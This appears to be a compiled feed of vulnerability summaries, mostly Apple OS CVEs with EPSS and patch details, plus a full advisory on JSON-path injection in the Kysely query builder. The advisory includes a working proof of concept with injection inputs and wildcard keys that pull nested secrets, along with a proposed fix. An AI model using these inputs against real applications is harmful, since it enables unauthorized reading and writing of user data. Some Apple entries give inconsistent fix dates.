Race condition in Apple operating systems allows local apps to access sensitive user data without authorization. Affects iOS and iPadOS versions below 26.5, macOS Sequoia 15.7.7, Sonoma 14.8.7, Tahoe 26.5, tvOS, visionOS, and watchOS versions below 26.5. Requires local app execution and user interaction. CVSS 5.5 reflects high confidentiality impact but low exploitation likelihood (EPSS 0.02%, 7th percentile).
Kernel memory layout disclosure in Apple iOS, iPadOS, macOS, tvOS, and watchOS allows a malicious application to read sensitive log data that exposes kernel address information, enabling KASLR bypass. The flaw stems from insufficient redaction of kernel pointers written to system logs (CWE-532) and was reported and patched by Apple across its operating system families. No public exploit identified at time of analysis and EPSS probability is very low (0.02%), but the issue is typically chained with memory-corruption bugs to achieve reliable kernel exploitation.
Gatekeeper security checks in macOS Tahoe can be bypassed using maliciously crafted ZIP archives due to a logic flaw in file handling. An attacker can create a weaponized ZIP file that, when extracted or opened by a user, circumvents Gatekeeper validation, potentially allowing execution of untrusted code. The vulnerability requires user interaction (opening or extracting the malicious archive) and is limited to local attack surface. Vendor-released patch: macOS Tahoe 26.5.
Out-of-bounds write in Apple operating systems allows local network attackers to cause denial-of-service via improved bounds checking bypass. Affects iOS/iPadOS (18.7.9+, 26.5+), macOS Sequoia (15.7.7+), Sonoma (14.8.7+), Tahoe (26.5+), tvOS (26.5+), visionOS (26.5+), and watchOS (26.5+). EPSS score of 0.02% indicates very low real-world exploitation probability despite local attack vector.
Web content processing across all major Apple platforms is vulnerable to a memory mismanagement flaw (CWE-119) that causes an unexpected process crash when a user visits or renders attacker-controlled web content. Affected platforms include iOS/iPadOS, macOS Tahoe, tvOS, visionOS, and watchOS - all versions prior to the 26.5 release line. The impact is limited to availability (A:H), with no confidentiality or integrity exposure per the CVSS vector, and no active exploitation is confirmed - EPSS sits at 0.02% (5th percentile) and SSVC rates exploitation as none, making this a moderate-priority patch rather than an emergency response item.
Memory-corruption crash in Apple's WebKit web-content engine lets a malicious website terminate the content-rendering process across iOS/iPadOS, macOS, tvOS, visionOS and watchOS prior to the 26.5 (and 18.7.9) releases. The flaw is triggered simply by viewing attacker-controlled web content, requiring no authentication but one user action (opening a page). There is no public exploit identified at time of analysis and SSVC rates exploitation as none, though the assigned CVSS 8.8 reflects worst-case memory-corruption potential rather than the crash-only behavior Apple documents.
The issue was addressed with improved memory handling. This issue is fixed in iOS 18.7.9 and iPadOS 18.7.9, iOS 26.5 and iPadOS 26.5, macOS Tahoe 26.5, tvOS 26.5, visionOS 26.5, watchOS 26.5. Processing maliciously crafted web content may lead to an unexpected process crash.
This issue was addressed through improved state management. This issue is fixed in macOS Sequoia 15.7.7, macOS Sonoma 14.8.7, macOS Tahoe 26.5. An app may be able to access private information.
A race condition was addressed with additional validation. This issue is fixed in macOS Tahoe 26.4. An app may be able to access sensitive user data.
A privacy issue was addressed by removing the vulnerable code. This issue is fixed in iOS 26.5 and iPadOS 26.5. An attacker with physical access may be able to use Visual Intelligence to access sensitive user data during iPhone Mirroring.
An out-of-bounds access issue was addressed with improved bounds checking. This issue is fixed in iOS 26.5 and iPadOS 26.5, macOS Tahoe 26.5, tvOS 26.5, visionOS 26.5, watchOS 26.5. Parsing a maliciously crafted file may lead to an unexpected app termination.
The issue was addressed with improved memory handling. This issue is fixed in macOS Sequoia 15.7.7, macOS Sonoma 14.8.7, macOS Tahoe 26.5. Processing a maliciously crafted image may corrupt process memory.
A buffer overflow was addressed with improved bounds checking. This issue is fixed in iOS 18.7.9 and iPadOS 18.7.9, iOS 26.5 and iPadOS 26.5, macOS Sequoia 15.7.7, macOS Sonoma 14.8.7, macOS Tahoe 26.5, tvOS 26.5, visionOS 26.5, watchOS 26.5. An app may be able to cause unexpected system termination.
## Summary Kysely 0.28.12 added a `sanitizeStringLiteral()` call inside `DefaultQueryCompiler.visitJSONPathLeg` (commit `0a602bf`, PR #1727) to fix CVE-2026-32763 (`GHSA-wmrf-hv6w-mr66`). The fix only doubles single quotes (`'` → `''`); it does **not** escape JSON-path metacharacters (`.`, `[`, `]`, `*`, `**`, `?`). When attacker-controlled input flows into `eb.ref(col, '->$').key(input)` or `.at(input)` - including type-safe code where the JSON column is shaped like `Record<string, T>` so `K extends string` is the inferred type - every dot becomes a path-leg separator, letting an attacker traverse from the intended key into sibling and child fields the developer never meant to expose. The result is read access (and, in update statements, write access) to JSON sub-fields outside the intended scope across MySQL, PostgreSQL `->$`/`->>$`, and SQLite. * Project: Kysely - TypeScript SQL query builder (npm `kysely`); affects MySQL, PostgreSQL `->$`/`->>$`, and SQLite dialects. * Source reviewed: `kysely-org/kysely` @ `master` (`73192e4`, version `0.28.16`). * Deployed artefact validated: `kysely@0.28.16` from npm. * Affected file(s): * `src/query-compiler/default-query-compiler.ts` (lines 1611-1639, 1821-1823) * `src/query-builder/json-path-builder.ts` (lines 93-196) * `src/dialect/mysql/mysql-query-compiler.ts` (overrides `sanitizeStringLiteral` but inherits the same behaviour for path legs - escapes `\` and `'`, nothing else) * CWE: CWE-89 - Improper Neutralization of Special Elements used in an SQL Command, with CWE-915 / CWE-1284 (improper validation of specified quantity in input) flavours for the JSON-path sub-language. * OWASP 2021: A03:2021 - Injection. ## Vulnerable code `src/query-compiler/default-query-compiler.ts:1625-1639`: ```ts protected override visitJSONPathLeg(node: JSONPathLegNode): void { const isArrayLocation = node.type === 'ArrayLocation' this.append(isArrayLocation ? '[' : '.') // (1) this.append( typeof node.value === 'string' ? this.sanitizeStringLiteral(node.value) // (2) : String(node.value), ) if (isArrayLocation) { this.append(']') } } ``` `src/query-compiler/default-query-compiler.ts:1821-1823`: ```ts protected sanitizeStringLiteral(value: string): string { return value.replace(LIT_WRAP_REGEX, "''") // (3) } ``` with `LIT_WRAP_REGEX = /'/g`. `src/query-builder/json-path-builder.ts:151-167`: ```ts key< K extends any[] extends O ? never : O extends object ? keyof NonNullable<O> & string : never, O2 = undefined extends O ? null | NonNullable<NonNullable<O>[K]> : null extends O ? null | NonNullable<NonNullable<O>[K]> : // when the object has non-specific keys, e.g. Record<string, T>, should infer `T | null`! string extends keyof NonNullable<O> ? null | NonNullable<NonNullable<O>[K]> : NonNullable<O>[K], >(key: K): TraversedJSONPathBuilder<S, O2> { return this.#createBuilderWithPathLeg('Member', key) // (4) } ``` `src/query-builder/json-path-builder.ts:169-196`: ```ts #createBuilderWithPathLeg( legType: JSONPathLegType, value: string | number, // (5) ): TraversedJSONPathBuilder<any, any> { // ... return new TraversedJSONPathBuilder( JSONPathNode.cloneWithLeg( this.#node, JSONPathLegNode.create(legType, value), // (6) ), ) } ``` At (1) the compiler emits the path-leg separator - `.` for member access or `[` for array index. At (2) the user-supplied string is run through `sanitizeStringLiteral`, which at (3) only doubles single quotes (`'`). Dots, brackets, asterisks, double-asterisks and question marks - every reserved character of the SQL/JSON path mini-language - pass through unmodified. At (4) `.key(K)` types `K` as `keyof NonNullable<O> & string`. When the JSON column is typed as `Record<string, T>` (a common shape for free-form metadata blobs) the inferred `K` is just `string`, so attacker-controlled input is **type-safe** and does not need a `Kysely<any>` escape hatch - this finding is *broader* than `GHSA-wmrf-hv6w-mr66` (CVE-2026-32763), which only covered the `Kysely<any>` case. At (5)/(6) the runtime accepts any `string | number` regardless of `legType`, so a string sent into `.at(...)` (`'last'`/`'#-N'` per the public type signature) also reaches the same emitter and can carry `]` to break out of the bracket. The fix at `0a602bf` only addressed the single-quote → string-literal escape. The JSON-path metacharacter set was overlooked. `MysqlQueryCompiler.sanitizeStringLiteral` (`src/dialect/mysql/mysql-query-compiler.ts:47-51`) overrides the helper to also escape backslashes - but again, it does nothing for `. [ ] * ** ?`. ## Reproduction (validated locally) Environment: `kysely@0.28.16` + `better-sqlite3@12.x`, Node 22, on macOS. The PoC harness lives in `/Users/admin/joplin_research/kysely-poc/`. ### Step 1 - Compiled-SQL evidence across all three dialects `/Users/admin/joplin_research/kysely-poc/poc.mjs` (no DB, just `.compile()`): ```bash $ node poc.mjs ===== MySQL ===== --- baseline: .key("nick") --- SQL: select `profile`->'$.nick' as `out` from `person` --- INJECTION via .key(ATTACKER) -- "nick.secret_field" --- SQL: select `profile`->'$.nick.secret_field' as `out` from `person` --- INJECTION via .key("*") -- wildcard reaches all keys --- SQL: select `profile`->'$.*' as `out` from `person` --- INJECTION via .at(ATTACKER3) -- bracket escape --- SQL: select `profile`->'$[].secret]' as `out` from `person` ===== PostgreSQL (->$ uses jsonpath, MySQL-like) ===== --- baseline: .key("nick") --- SQL: select "profile"->'$.nick' as "out" from "person" --- INJECTION via .key(ATTACKER) --- SQL: select "profile"->'$.nick.secret_field' as "out" from "person" ===== SQLite ===== --- baseline: .key("nick") --- SQL: select "profile"->>'$.nick' as "value" from "person" --- INJECTION via .key(ATTACKER) --- SQL: select "profile"->>'$.nick.secret_field' as "out" from "person" --- INJECTION via .key("*") --- SQL: select "profile"->>'$.*' as "out" from "person" ``` The compiled SQL clearly shows the dot inside the user-supplied "key" being interpreted by the database as a path separator: `'$.nick'` (one leg) becomes `'$.nick.secret_field'` (two legs). MySQL additionally accepts `*` as a wildcard reaching every member at the current level. ### Step 2 - End-to-end data disclosure on a real database `/Users/admin/joplin_research/kysely-poc/sqlite-runtime.mjs` simulates a typical handler that reads one top-level field of the caller's profile: ```js async function fetchProfileField(userInput) { return db.selectFrom('me') .select(eb => eb.ref('profile', '->>$').key(userInput).as('value')) .where('id', '=', 1) .execute() } ``` The `me.profile` JSON column for user 1 is: ```json { "nick": "alice", "tagline": "hi", "internal": { "ssn": "111-11-1111", "token": "tok_abcdef", "admin": true } } ``` The developer's intent: only top-level keys (`nick`, `tagline`) are ever requested. `internal` is private bookkeeping. ```bash $ node sqlite-runtime.mjs ===== Legitimate request ===== userInput = "nick" compiled SQL: select "profile"->>'$.nick' as "value" from "me" where "id" = ? result: [ { value: 'alice' } ] ===== Injection: dot lets attacker reach nested "internal" object ===== userInput = "internal.ssn" compiled SQL: select "profile"->>'$.internal.ssn' as "value" from "me" where "id" = ? result: [ { value: '111-11-1111' } ] userInput = "internal.token" compiled SQL: select "profile"->>'$.internal.token' as "value" from "me" where "id" = ? result: [ { value: 'tok_abcdef' } ] userInput = "internal.admin" compiled SQL: select "profile"->>'$.internal.admin' as "value" from "me" where "id" = ? result: [ { value: 1 } ] ``` Expected vs. actual: the application invariant was "the user can only read top-level keys of their profile". The output violates that invariant - `internal.ssn`, `internal.token`, and `internal.admin` are returned even though `internal` was never meant to be addressable through this endpoint. The same pattern is exploitable on MySQL (where `*` and `**` wildcards make it strictly worse - a single `*` enumerates every sibling at the current level in one row) and on PostgreSQL when using the `->$`/`->>$` operators (which target MySQL-style JSON-path strings on PG ≥ 17 / via `jsonb_path_query`). ## Impact * **Authorization bypass on JSON sub-fields.** Any kysely-built query whose JSON-path key/index argument is partially or fully attacker-controlled - even in fully type-safe code where the column type is `Record<string, T>` - leaks data the developer believed was scoped behind the explicitly-listed key. SSNs, tokens, admin flags, internal IDs, anything stored as a nested member of the same JSON document is reachable. * **Wildcard reads on MySQL / PostgreSQL `->$`.** `key('*')` compiles to `'$.*'`, returning the array of every value at the current depth in one round-trip. `key('**')` recurses across the whole document. The fix does not strip either token. * **Write access in update statements.** Kysely uses the same path compiler for `update().set(eb => eb.ref(col, '->$').key(input), value)`-style writes (and `jsonb_set` helpers). An attacker who can drive both the path and the value can therefore write into nested fields they should not be able to set - for example flipping an `admin` flag or rewriting a nested role. * **Bypasses the recently-fixed precedent.** The maintainers shipped commit `0a602bf` (PR #1727) specifically to harden this surface. That fix removed the `'` (quote) primitive but left every JSON-path metacharacter alone, so the surface is still open against any caller that *thought* it was now safe. * **Practical bounding.** The attacker needs a code path where a request-derived string lands in `.key(...)` or `.at(...)`. This is a recognised pattern (filter-by-field, dynamic `select` for admin dashboards, Strapi-style JSON-blob columns); it is not a default kysely behaviour but is plausibly common. The vulnerable path is also exercised any time a developer writes `db as Kysely<any>` (covered by the older `GHSA-wmrf-hv6w-mr66` advisory) - but unlike that advisory, the bug here triggers in fully-typed code on `Record<string, T>` columns. ## Suggested fix Treat path legs as a structured emission, not a string-literal escape. The narrowest safe patch is a dedicated `sanitizeJSONPathLeg` that only emits a known-good character set per leg type and rejects everything else, since JSON-path quoting differs by dialect (MySQL allows `"…"`-quoted member names; SQLite is more permissive but still has a grammar; PostgreSQL `jsonpath` is strict). ```ts // src/query-compiler/default-query-compiler.ts const JSON_PATH_MEMBER_OK = /^[A-Za-z_$][A-Za-z0-9_$]*$/ protected override visitJSONPathLeg(node: JSONPathLegNode): void { if (node.type === 'ArrayLocation') { this.append('[') if (typeof node.value === 'number') { this.append(String(node.value | 0)) // int-coerce } else if (node.value === 'last' || /^#-\d+$/.test(node.value)) { this.append(node.value) // documented dialect tokens } else { throw new Error(`invalid JSON array index: ${node.value}`) } this.append(']') return } // Member this.append('.') if (typeof node.value !== 'string' || !JSON_PATH_MEMBER_OK.test(node.value)) { // Per-dialect quoted-member escape would go here; default = reject. throw new Error(`invalid JSON path member: ${JSON.stringify(node.value)}`) } this.append(node.value) } ``` For dialect-specific behaviour (MySQL `"…"`-quoted members, SQLite bracket-quoted), each dialect compiler should override the helper and apply the appropriate quoting + double-the-quote rule, the same way `sanitizeIdentifier` already does. Consider also: parameterise JSON paths whenever the dialect supports it (PostgreSQL `jsonb_path_query($1, $2)`, MySQL `JSON_EXTRACT(?, ?)`), so attacker-controlled keys are bound, not concatenated. Add a regression test to `test/node/src/json-traversal.test.ts` asserting that `eb.ref('c','->$').key('a.b').compile().sql` is **either** rejected, **or** emits MySQL `'$."a.b"'` / SQLite `'$.["a.b"]'` (quoted-member form), and explicitly differs from `key('a').key('b')`. A backstop hardening: tighten the `.at()` runtime to accept only `number | 'last' | '#-${digits}'` (matching the type signature), and tighten `.key()` to only accept strings that match `keyof O` at runtime when `O` is statically known.
memono Notepad 4.2 contains a denial of service vulnerability that allows attackers to crash the application by pasting excessively long character buffers into note fields. Rated high severity (CVSS 8.7), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.
Command injection in aandrew-me tgpt up to version 2.11.1 allows local authenticated attackers to execute arbitrary commands via the helper.Update function in helper.go. The vulnerability requires local file system access and an authenticated user context but results in only limited confidentiality impact. Public exploit code exists, though the vendor has not responded to early disclosure attempts, leaving affected users without an official patch.
Cross-site scripting (XSS) in mistune's HTMLRenderer.heading() allows injection of arbitrary HTML attributes when custom heading_id callbacks return unsanitized heading text. The vulnerability occurs because the id attribute value is concatenated directly into the HTML tag without escaping, enabling attackers who control heading content to break out of the id= attribute and inject event handlers or other malicious attributes. Exploitation requires a caller-supplied heading_id callback that derives IDs from heading text - the most common real-world pattern used by documentation generators like MkDocs, Sphinx, and Jekyll. Publicly available proof-of-concept demonstrates mouse-over triggered JavaScript execution via onmouseover attribute injection.
Sandbox escape vulnerability in Apple operating systems allows malicious apps with low privileges to break out of application sandbox and execute code with elevated privileges on the host system. Affects iOS, iPadOS, macOS, tvOS, visionOS, and watchOS across multiple versions. Apple has released patches for all affected platforms. EPSS score of 0.02% (7th percentile) indicates low probability of mass exploitation in the wild, though the CVSS 8.8 score reflects significant potential impact if successfully weaponized. No active exploitation confirmed at time of analysis.
Type confusion vulnerability in Apple's operating systems allows remote unauthenticated attackers to trigger denial of service across iOS, iPadOS, macOS, tvOS, visionOS, and watchOS. Apple has released patches addressing the issue in iOS/iPadOS 18.7.9 and 26.5, macOS Tahoe 26.5, tvOS 26.5, visionOS 26.5, and watchOS 26.5. The CVSS vector indicates network-accessible exploitation with low complexity and no privileges required, though EPSS score of 0.13% (32nd percentile) suggests relatively low likelihood of widespread exploitation. No public exploit identified at time of analysis, and the vulnerability is not listed in CISA KEV.
Process memory corruption in Apple's image processing subsystem across iOS, iPadOS, macOS, tvOS, and visionOS allows remote attackers to extract confidential data from process memory via crafted images. The vulnerability affects all Apple operating systems prior to their respective May 2026 security updates. CVSS vector indicates network-based, unauthenticated exploitation requiring no user interaction beyond processing the image, though the CVSS score focuses on confidentiality impact (C:H) with no integrity or availability impact. EPSS score of 0.02% suggests low observed exploitation likelihood, with no CISA KEV listing or public POC identified at time of analysis. Apple has released patches across all affected platforms.
The issue was addressed with improved input validation. This issue is fixed in iOS 18.7.9 and iPadOS 18.7.9, iOS 26.5 and iPadOS 26.5, macOS Tahoe 26.5, tvOS 26.5, visionOS 26.5, watchOS 26.5. Processing maliciously crafted web content may lead to an unexpected process crash.
The issue was addressed with improved memory handling. This issue is fixed in iOS 18.7.9 and iPadOS 18.7.9, iOS 26.5 and iPadOS 26.5, macOS Sequoia 15.7.7, macOS Sonoma 14.8.7, macOS Tahoe 26.5, tvOS 26.5, visionOS 26.5, watchOS 26.5. Processing an audio stream in a maliciously crafted media file may terminate the process.
The issue was addressed with improved memory handling. This issue is fixed in iOS 26.5 and iPadOS 26.5, macOS Tahoe 26.5, tvOS 26.5, visionOS 26.5, watchOS 26.5. Processing maliciously crafted web content may lead to an unexpected process crash.
Memory corruption in Apple operating systems allows remote attackers to trigger unexpected app termination or corrupt process memory by delivering a maliciously crafted media file to users, requiring user interaction to open the file. Affects iOS/iPadOS 26.4 and earlier, macOS Sequoia 15.7.6 and earlier, macOS Sonoma 14.8.6 and earlier, macOS Tahoe 26.4 and earlier, tvOS 26.4 and earlier, visionOS 26.4 and earlier, and watchOS 26.4 and earlier. No public exploit identified at time of analysis; vendor-released patches are available across all affected platforms.
An issue with app access to camera metadata was addressed with improved logic. This issue is fixed in iOS 18.7.9 and iPadOS 18.7.9, iOS 26.5 and iPadOS 26.5, visionOS 26.5. An app may be able to capture a user's screen.
The issue was addressed with improved checks. This issue is fixed in iOS 18.7.9 and iPadOS 18.7.9, macOS Sequoia 15.7.7, macOS Tahoe 26.5. Processing a maliciously crafted file may lead to a denial-of-service or potentially disclose memory contents.
A use-after-free vulnerability in Apple's Wi-Fi stack allows attackers in a privileged network position to cause denial-of-service via crafted Wi-Fi packets. The vulnerability affects iOS and iPadOS versions prior to 26.5 and 18.7.9, macOS versions prior to 26.5, 15.7.7, and 14.8.7, and tvOS, watchOS versions prior to 26.5. Exploitation requires adjacent network access and specific radio conditions (AC:H) but results in high availability impact with no active public exploitation identified.
Remote attackers can crash Apple devices or corrupt kernel memory without authentication via a use-after-free vulnerability affecting iOS, iPadOS, macOS, tvOS, visionOS, and watchOS. Apple has released patches across eight separate security bulletins (HT127110-127120) fixing this memory management flaw in all supported OS versions. EPSS score of 0.10% (28th percentile) suggests low exploitation probability despite the network-accessible attack vector and lack of authentication requirements. No active exploitation or public POC identified at time of analysis.
macOS Tahoe allows applications to access protected user data due to insufficient permission enforcement on system APIs. The vulnerability affects all macOS versions prior to 26.5 and is tagged as an authentication bypass, indicating apps can circumvent permission prompts or system restrictions to read sensitive data without user consent. While not yet actively exploited (EPSS 0.01%, no CISA KEV listing), the CVSS vector (AV:N/AC:L/PR:N/UI:N) appears inconsistent with the local application context described, suggesting potential network-accessible component or misclassified attack vector requiring vendor clarification.
High confidentiality information disclosure across Apple's ecosystem (iOS, iPadOS, macOS, visionOS) allows remote unauthenticated attackers to extract sensitive data by delivering a maliciously crafted file. The vulnerability affects all current Apple operating systems and was fixed in March 2026 security updates (iOS/iPadOS 18.7.9/26.5, macOS 14.8.7/26.5, visionOS 26.5). Despite CVSS 7.5 HIGH rating and network attack vector requiring no privileges, EPSS exploitation probability is very low at 0.02% (5th percentile), suggesting minimal real-world risk. No active exploitation confirmed (not in CISA KEV) and no public POC identified at time of analysis.
Apps on iOS and iPadOS can bypass App Privacy Report logging due to insufficient entitlement checks, allowing malicious applications to conceal their privacy-invasive activities from users. Fixed in iOS/iPadOS 18.7.9 and 26.4. The CVSS vector (AV:N/AC:L/PR:N/UI:N) appears inconsistent with the actual attack requirements, as exploitation requires a malicious app already installed on the device, not remote network access. Despite the 7.5 CVSS score, EPSS exploitation probability is very low (0.02%, 5th percentile), no active exploitation is confirmed, and no public exploit code identified at time of analysis.
Physical access to a locked macOS Tahoe device prior to version 26.5 allows an attacker to view sensitive user information without authentication. The vulnerability has a low EPSS score (0.02%, 6th percentile) and CISA assesses it as non-exploitable in the wild (SSVC exploitation: none), indicating this is a low-probability real-world threat despite the confidentiality impact rating. The fix is available in macOS Tahoe 26.5.
Improper bounds checking in Apple operating systems allows processing of maliciously crafted files to cause unexpected application termination (denial of service) on iOS, iPadOS, macOS, tvOS, visionOS, and watchOS. The vulnerability affects multiple major OS versions and requires local file processing without user interaction, but has extremely low real-world exploitation probability (EPSS 0.02%) despite moderate CVSS score.
Information leakage in Apple operating systems allows remote attackers to extract sensitive data by crafting and hosting malicious websites that users visit. The vulnerability affects iOS 18.7.8 and earlier, iPadOS 18.7.8 and earlier, macOS Sequoia 15.7.6 and earlier, macOS Sonoma 14.8.6 and earlier, macOS Tahoe 26.4 and earlier, tvOS 26.4 and earlier, visionOS 26.4 and earlier, and watchOS 26.4 and earlier. Exploitation requires user interaction (UI:R) to visit a malicious website but does not require authentication, with an EPSS score of 0.03 percent indicating low real-world exploitation probability despite the information disclosure impact.
Local authenticated apps bypass user consent mechanisms to access sensitive user data across iOS 18.7.8 and earlier, iPadOS 18.7.8 and earlier, macOS Sequoia 15.7.6 and earlier, macOS Sonoma 14.8.6 and earlier, macOS Tahoe 26.4 and earlier, and visionOS 26.4 and earlier. The vulnerability allows malicious or compromised applications running with standard user privileges to exfiltrate protected information without triggering the expected permission prompts. Apple has patched this by implementing an additional consent verification layer, though the low EPSS score (0.02%) suggests real-world exploitation remains limited.
Null pointer dereference in Apple operating systems (iOS, iPadOS, macOS Tahoe, tvOS) allows local network attackers to cause denial of service by sending crafted input that bypasses validation. The vulnerability affects all versions prior to iOS 26.5, iPadOS 26.5, macOS Tahoe 26.5, and tvOS 26.5. No code execution or data compromise is possible; impact is limited to availability disruption on affected devices.
A race condition in Apple operating systems allows authenticated local attackers to access sensitive user data with high complexity exploitation. The vulnerability affects iOS 18.7.9 and earlier, iPadOS 18.7.9 and earlier, iOS 26.5 and earlier, iPadOS 26.5 and earlier, macOS Sequoia 15.7.7 and earlier, macOS Sonoma 14.8.7 and earlier, macOS Tahoe 26.5 and earlier, and visionOS 26.5 and earlier. Vendor-released patches are available, and exploitation requires local access with user-level privileges and high technical complexity. The EPSS score of 0.02% and absence from active exploitation databases indicate low real-world exploitation risk despite the high confidentiality impact.
Buffer overflow in Apple operating systems allows local unauthenticated users to cause unexpected system termination or read kernel memory without requiring user interaction. The vulnerability affects iOS, iPadOS, macOS, tvOS, visionOS, and watchOS across multiple versions, with exploitation limited to local access. Vendor-released patches are available for all affected platforms, and EPSS scoring of 0.03% indicates exploitation remains unlikely despite the local attack vector.
Denial of service in Apple macOS prior to version 26.5 allows remote attackers to crash Safari via maliciously crafted web content that triggers a use-after-free memory condition. The vulnerability requires user interaction (opening a malicious webpage) but no authentication, affecting all macOS versions before 26.5. EPSS exploitation probability is very low at 0.02%, suggesting limited real-world attack incentive despite the crash capability.
Content Security Policy bypass in Apple's WebKit-based platforms (iOS, iPadOS, macOS Tahoe, tvOS, visionOS, watchOS) allows maliciously crafted web content to evade CSP enforcement, undermining a core browser defense against XSS and data exfiltration. Apple addressed the input validation flaw across its product line in coordinated June 2026 updates. No public exploit is identified at time of analysis and EPSS is very low (0.03%), but the cross-platform reach and high CIA impact via user interaction make patching a priority.
Out-of-bounds read in Apple operating systems allows malicious applications to crash the system or leak kernel memory across iOS/iPadOS 26.5, macOS Tahoe 26.5, tvOS 26.5, and watchOS 26.5. The vulnerability requires local application execution but no user interaction, enabling information disclosure and denial-of-service attacks. Despite high CVSS 7.3 scoring, the EPSS probability is very low (0.02%, 5th percentile), indicating minimal observed exploitation activity. Vendor-released patches are available for all affected platforms.
An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 18.7.9 and iPadOS 18.7.9, macOS Sequoia 15.7.7, macOS Sonoma 14.8.7, macOS Tahoe 26.5. An app may be able to execute arbitrary code with kernel privileges.
Kernel memory disclosure vulnerability affects all major Apple operating systems through improper memory handling. Malicious apps can read sensitive kernel memory contents remotely without authentication (CVSS 7.5, AV:N). Apple has released patches across iOS/iPadOS (versions 18.7.9 and 26.5), macOS (Sequoia 15.7.7, Sonoma 14.8.7, Tahoe 26.5), tvOS 26.5, visionOS 26.5, and watchOS 26.5. Despite the network attack vector, EPSS score remains very low at 0.02% (7th percentile), suggesting limited real-world exploitation probability. No active exploitation confirmed (not in CISA KEV), and no public exploit code identified at time of analysis.
Insufficient permission enforcement in macOS Tahoe prior to 26.5 allows applications to bypass access controls and read protected user data without proper authorization. Apple addressed the vulnerability through hardened permission checks in version 26.5. EPSS probability indicates minimal observed exploitation activity (0.01%, 3rd percentile), and no public exploit code or CISA KEV listing exists at time of analysis, suggesting exploitation requires application-specific development effort rather than readily available tooling.
Denial-of-service vulnerability in iOS and iPadOS allows network-positioned attackers with high privileges to crash or degrade service availability through insufficient input validation. Apple addressed this with patches in iOS 18.7.7, iPadOS 18.7.7, iOS 26.4, and iPadOS 26.4. EPSS score of 0.02% (5th percentile) indicates very low real-world exploitation probability despite CVSS score of 4.9.
Privacy bypass in Apple operating systems allows local authenticated apps to circumvent user-configured privacy restrictions through permission mishandling. The vulnerability affects iOS, iPadOS, macOS Tahoe, visionOS, and watchOS versions prior to 26.5. An attacker with local app execution privileges can access sensitive data classified as restricted by user privacy settings, though without authentication bypass or integrity compromise. Fixed in coordinated OS updates across Apple's ecosystem.
The issue was addressed with improved UI handling. This issue is fixed in iOS 26.5 and iPadOS 26.5, macOS Tahoe 26.5, visionOS 26.5. A malicious iframe may use another website’s download settings.
An authorization issue was addressed with improved state management. This issue is fixed in macOS Tahoe 26.4. An app may be able to access sensitive user data.
Privilege escalation in Apple operating systems allows local authenticated applications to gain root privileges through an authorization flaw in state management. Affects multiple macOS versions (Sonoma, Sequoia, Tahoe) and iOS/iPadOS versions prior to patched releases. Apple has issued coordinated security updates across all affected platforms (iOS 18.7.9/26.5, iPadOS 18.7.9/26.5, macOS Sonoma 14.8.7, Sequoia 15.7.7, Tahoe 26.5). EPSS score of 0.02% (5th percentile) indicates low probability of widespread exploitation despite high CVSS 7.8, with no public exploit identified at time of analysis and no CISA KEV listing. The local attack vector requiring authenticated privileges substantially reduces immediate risk compared to network-based vulnerabilities.
IP address tracking across iOS, iPadOS, macOS, and visionOS allows remote attackers to correlate user activity without authentication due to improper state management (CWE-359: Exposure of Private Personal Information). The vulnerability affects default configurations across six Apple OS versions with network-accessible attack vector and low complexity. EPSS score of 0.02% (7th percentile) indicates minimal observed exploitation activity. Apple released coordinated patches across all affected platforms in March 2026 security updates.
Improper permissions checking in macOS before version 26.4 allows a malicious app with local user privileges to access arbitrary files without user interaction, potentially exposing sensitive data. The vulnerability has a low EPSS score (0.01%) and no confirmed active exploitation, making it a low-priority but real local privilege escalation risk for systems where untrusted applications may execute.
Use-after-free in WebKit allows remote attackers to trigger Safari crashes and potentially achieve arbitrary code execution across Apple's entire ecosystem (iOS, iPadOS, macOS, tvOS, visionOS, watchOS) via maliciously crafted web content. Users must visit or be tricked into visiting a malicious webpage (UI:R). Despite CVSS 8.8 (High) with theoretical code execution impact (C:H/I:H/A:H), EPSS probability is extremely low (0.02%, 5th percentile), indicating minimal observed exploitation activity. No public exploit identified at time of analysis, and vendor patches are available across all platforms as of version 26.5.
Memory corruption in Safari's WebKit engine across all Apple platforms allows remote attackers to trigger information disclosure via maliciously crafted web content delivered through network-accessible attack vectors requiring no authentication or user interaction. Despite the vendor description focusing on crash scenarios, the CVSS vector (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N) indicates high confidentiality impact with no availability impact, suggesting potential memory disclosure rather than denial of service. Patched in iOS/iPadOS 26.5, macOS Tahoe 26.5, tvOS 26.5, visionOS 26.5, and watchOS 26.5. EPSS score of 0.02% (5th percentile) suggests low probability of mass exploitation despite network-accessible attack vector.
Memory corruption in Apple operating systems due to a race condition in locking mechanisms allows local authenticated attackers to cause unexpected app termination or potential denial of service. The vulnerability affects iOS 18.7.8 and earlier, iPadOS 18.7.8 and earlier, macOS Sequoia 15.7.6 and earlier, macOS Sonoma 14.8.6 and earlier, macOS Tahoe 26.4 and earlier, tvOS 26.4 and earlier, visionOS 26.4 and earlier, and watchOS 26.4 and earlier. Vendor-released patches are available across all affected platforms, with no public exploit identified at time of analysis.
Integer overflow in Apple operating systems allows remote unauthenticated attackers to crash devices via maliciously crafted input, causing denial of service through system termination. Affects iOS/iPadOS versions prior to 18.7.9, macOS Sequoia prior to 15.7.7, macOS Sonoma prior to 14.8.7, and macOS Tahoe prior to 26.5. Apple has released patches for all affected platforms. Despite the network attack vector and lack of authentication requirements (CVSS AV:N/PR:N), EPSS exploitation probability is very low at 0.02% (5th percentile), and no public exploits or active exploitation have been identified. Not listed in CISA KEV, suggesting limited real-world targeting.
Memory corruption in WebKit across Apple platforms (iOS, iPadOS, macOS, tvOS, visionOS) allows remote attackers to access sensitive information via malicious web content. CVSS vector indicates network-based exploitation requiring no user interaction or authentication (AV:N/AC:L/PR:N/UI:N), contradicting the description's 'process crash' outcome with the High Confidentiality impact rating. EPSS score of 0.02% (5th percentile) suggests low real-world exploitation probability. Vendor patches available for all affected platforms (version 26.5). SSVC framework rates this as automatable with partial technical impact but no observed exploitation.
Local privilege escalation in macOS allows authenticated users with low-level access to gain root privileges through a permissions enforcement flaw. Affects macOS Tahoe (pre-26.4), Sequoia (pre-15.7.7), and Sonoma (pre-14.8.7). Apple has released patches for all affected versions. Despite CVSS 7.8, EPSS score of 0.01% indicates minimal observed exploitation activity. No public exploit code identified at time of analysis, though the local attack vector and low complexity suggest post-compromise utility rather than initial access vector.
